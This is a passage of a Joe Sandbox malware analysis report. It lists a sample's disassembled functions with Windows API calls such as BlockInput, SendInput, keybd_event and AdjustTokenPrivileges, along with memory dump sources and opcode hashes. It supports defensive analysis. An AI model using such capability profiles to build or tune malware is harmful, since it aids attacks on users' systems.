                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                      • String ID:
                                                                                      • API String ID: 3429775523-0
                                                                                      • Opcode ID: bff7a0d9a5cb832bfb21b234867fe59d512c323820def197e7ea3a00f5fd32e8
                                                                                      • Instruction ID: 898343ee388d655ec6f12f1e0bc00277d922201809b093cc4f8b6086b2058117
                                                                                      • Opcode Fuzzy Hash: bff7a0d9a5cb832bfb21b234867fe59d512c323820def197e7ea3a00f5fd32e8
                                                                                      • Instruction Fuzzy Hash: B4F0F47195030DFBDB00DFE4DC89AAEBBBCEB08604F508565E901E2181E774AA448A50
                                                                                      Function 00C34CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00C428E9,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002,00000000,?,00C428E9), ref: 00C34D09
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002,00000000,?,00C428E9), ref: 00C34D10
                                                                                      • ExitProcess.KERNEL32 ref: 00C34D22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: e75662ccd4da236ffea0e86434a227be8e05ef92e74809bf54268809dfef3741
                                                                                      • Instruction ID: 429575f8c5f58df28a44c2bd8217250b843c43b2bb9ab45a6a6a540bd2adab8f
                                                                                      • Opcode Fuzzy Hash: e75662ccd4da236ffea0e86434a227be8e05ef92e74809bf54268809dfef3741
                                                                                      • Instruction Fuzzy Hash: 20E0B631011148ABCF15AF54DD49B9D3B79FB42795F104014FD159B132CB39EE42DA80
                                                                                      Function 00C4C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: bd8974faab7658b2fbd098f7e10ba7f11304eb1fbc03d0ba6edc16c6d6038988
                                                                                      • Instruction ID: aa57329da45b31abb9fd35af3afd230cff4767010fdb172cf06c7ec3e17eb33b
                                                                                      • Opcode Fuzzy Hash: bd8974faab7658b2fbd098f7e10ba7f11304eb1fbc03d0ba6edc16c6d6038988
                                                                                      • Instruction Fuzzy Hash: 12412676901219ABCB249FB9CC89EFB77B8FB84314F504269F915D71A0E6709E81CB50
                                                                                      Function 00C6D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00C6D28C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID: X64
                                                                                      • API String ID: 2645101109-893830106
                                                                                      • Opcode ID: be7f165c43e8ae9649a83f4ff9f4f0fe053e62017de12ad1a16b1745a99e20e0
                                                                                      • Instruction ID: cbc79ea8dae363fc5df70ce96358180b562a8a6ce589af106061b0a5be7de481
                                                                                      • Opcode Fuzzy Hash: be7f165c43e8ae9649a83f4ff9f4f0fe053e62017de12ad1a16b1745a99e20e0
                                                                                      • Instruction Fuzzy Hash: DBD0CAB480116DEACBA0CBA0ECC8EDEB7BCBB14309F100292F106A2000DB309A488F20
                                                                                      Function 00C3CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction ID: 8894962b4598f3fe915d4ca39a0204fc49701403902d9fcb38243183b20ce92a
                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction Fuzzy Hash: F2021D72E102199BDF14DFA9D8C06ADFBF1EF48314F258169D829F7384D731AA418B94
                                                                                      Function 00C868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C86918
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C86961
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: eb4d9e66360b8a78f79573fa8fb2ba595ac58953673f747a709655c2c9e33bac
                                                                                      • Instruction ID: 5a1de72ba758379a097a29bf80ed1de3cb38a48bdaacd57cb4514d162d054e32
                                                                                      • Opcode Fuzzy Hash: eb4d9e66360b8a78f79573fa8fb2ba595ac58953673f747a709655c2c9e33bac
                                                                                      • Instruction Fuzzy Hash: 1B117C316042109FC710DF69D488A1ABBE5EF85328F14C699E4698B7A2CB30EC45CB91
                                                                                      Function 00C837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C94891,?,?,00000035,?), ref: 00C837E4
                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C94891,?,?,00000035,?), ref: 00C837F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: af410c4e8040afcf625adf4c5ab35dfc35b5a2488a3c27a02348396bad5d8947
                                                                                      • Instruction ID: cb73d12b166f1e19a0a27626f7a8fe1f3b4cce4565741aed640d70d5c22dd2ea
                                                                                      • Opcode Fuzzy Hash: af410c4e8040afcf625adf4c5ab35dfc35b5a2488a3c27a02348396bad5d8947
                                                                                      • Instruction Fuzzy Hash: 38F0EC707052142AD71067664C8DFDB369DDFC5B65F000275F505D32D1D9609944C7B0
                                                                                      Function 00C7B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C7B25D
                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00C7B270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: InputSendkeybd_event
                                                                                      • String ID:
                                                                                      • API String ID: 3536248340-0
                                                                                      • Opcode ID: bc23a3b532b469837c1af17165f28f159e5f4f61b62308a9e8e3b725311218c3
                                                                                      • Instruction ID: e16f186d3bd8d0b67185c778b6b6608db78b5e7884a08d45f57ec85398ce212b
                                                                                      • Opcode Fuzzy Hash: bc23a3b532b469837c1af17165f28f159e5f4f61b62308a9e8e3b725311218c3
                                                                                      • Instruction Fuzzy Hash: 63F0177180428EABDB059FA1C806BBE7BB4FF09309F00800AF965A61A2C37986119F94
                                                                                      Function 00C710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C711FC), ref: 00C710D4
                                                                                      • CloseHandle.KERNEL32(?,?,00C711FC), ref: 00C710E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: 5b6158676e33cf62952987cc4be51bd718f20151cdf355f5a5b3dfe8f4a9882e
                                                                                      • Instruction ID: 1bf079d85bd97b1309aa5e3218651f9687a906fe9dbff86da87f3f35ff50a1ac
                                                                                      • Opcode Fuzzy Hash: 5b6158676e33cf62952987cc4be51bd718f20151cdf355f5a5b3dfe8f4a9882e
                                                                                      • Instruction Fuzzy Hash: EEE04F32004610AEE7252B15FC05FB777A9EF04320F14882DF4A6814B1DB626C90EB10
                                                                                      Function 00C1CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Variable is not of type 'Object'., xrefs: 00C60C40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable is not of type 'Object'.
                                                                                      • API String ID: 0-1840281001
                                                                                      • Opcode ID: 9e16b3d46dee8a303e3402b7d4e5059fe251cbb82d063a37fdf5ac1c857772c4
                                                                                      • Instruction ID: 5a7f2ca92053cd82ee79e8c1a6cdb1a61c29ffaf67184bf4616391ccaec4885d
                                                                                      • Opcode Fuzzy Hash: 9e16b3d46dee8a303e3402b7d4e5059fe251cbb82d063a37fdf5ac1c857772c4
                                                                                      • Instruction Fuzzy Hash: DB32AE30940218DBCF24DF94D8D1AEEB7B5FF06304F248059F816AB292D735AE86EB51
                                                                                      Function 00C4676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C46766,?,?,00000008,?,?,00C4FEFE,00000000), ref: 00C46998
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 6f7e0484133966bb2604fb18c379eb1b12d0b42764fbd87d34a67e041b2ec68f
                                                                                      • Instruction ID: 0925d2ffd9d8a33951c5a309b2772b0767da1d4e6bad6e5f0d2a04d9e028f324
                                                                                      • Opcode Fuzzy Hash: 6f7e0484133966bb2604fb18c379eb1b12d0b42764fbd87d34a67e041b2ec68f
                                                                                      • Instruction Fuzzy Hash: 2EB14C316106089FD715CF28C486B657BE0FF46368F258658E8E9CF2E6C335EA91CB41
                                                                                      Function 00C2B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 3196eb8806bcf009b612c7e23ca401bd271dd0cea73bfd2cca6050edd52228d1
                                                                                      • Instruction ID: dfe0c99ed0e16f95f08f602380d8ce1aae399e6a3624bfc857e2ede2558a2488
                                                                                      • Opcode Fuzzy Hash: 3196eb8806bcf009b612c7e23ca401bd271dd0cea73bfd2cca6050edd52228d1
                                                                                      • Instruction Fuzzy Hash: 91127E71D002299BCB24DF59D8806EEB7F5FF48310F1481AAE859EB251DB309E85DF90
                                                                                      Function 00C8EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • BlockInput.USER32(00000001), ref: 00C8EABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockInput
                                                                                      • String ID:
                                                                                      • API String ID: 3456056419-0
                                                                                      • Opcode ID: 2726b5a806b37ab9c7252284116c77cd4e646d98368d6a27c337248c587e7782
                                                                                      • Instruction ID: 66d9ef0073953bd7545f71ba37ef35e0037187c3a25581f5ec9156968ab65642
                                                                                      • Opcode Fuzzy Hash: 2726b5a806b37ab9c7252284116c77cd4e646d98368d6a27c337248c587e7782
                                                                                      • Instruction Fuzzy Hash: 86E01A31200204AFC710EF5AD844E9ABBE9AF99764F008416FC49C7351DA70E881AB90
                                                                                      Function 00C309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00C303EE), ref: 00C309DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: fe9d2f5e2414aa138904cbd89e183879a4ac44fa8df305a4ccf03c403a4390aa
                                                                                      • Instruction ID: bcd5e5b7ac518b4d10a9a3abc5cdc8a01e7340b3ceedb4279bfa92d12fd79366
                                                                                      • Opcode Fuzzy Hash: fe9d2f5e2414aa138904cbd89e183879a4ac44fa8df305a4ccf03c403a4390aa
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 00C3781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction ID: 3fb99e9943a86ff3dcaf643888caa725ae425c106688d0badbddf5a3c03b1c09
                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction Fuzzy Hash: 345168F163C7456BDF388569895EBBE63D99B06300F180B09E8A2EB2C2C615DF05E353
                                                                                      Function 00C46DD9 Relevance: .6, Instructions: 637COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f13ecc687bd88667465eb24ecf397931a71fcb07ff248d553a8dbc6d7dfc077
                                                                                      • Instruction ID: d2077ef76cba0b0e5c03431ffe619f395ff722b22e1f6bb21134b3159823f6f7
                                                                                      • Opcode Fuzzy Hash: 8f13ecc687bd88667465eb24ecf397931a71fcb07ff248d553a8dbc6d7dfc077
                                                                                      • Instruction Fuzzy Hash: BC321332D29F414DDB239635CC2233AA649BFB73C5F15D737E82AB5AA5EB29C5834100
                                                                                      Function 00C2CC39 Relevance: .6, Instructions: 635COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a89413fba1c3d778ee3237d6e3c89706a67a1afe8d13432c3e3442958e0eebbc
                                                                                      • Instruction ID: eb0ebfad99496317d305605af0bc04efb408d1450eec7ecf53559cd84f238466
                                                                                      • Opcode Fuzzy Hash: a89413fba1c3d778ee3237d6e3c89706a67a1afe8d13432c3e3442958e0eebbc
                                                                                      • Instruction Fuzzy Hash: 50320531A042658BCF38CF69D8D467D7BA1EB45300F28856BD4EADB692D234DF81EB41
                                                                                      Function 00C17920 Relevance: .6, Instructions: 563COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
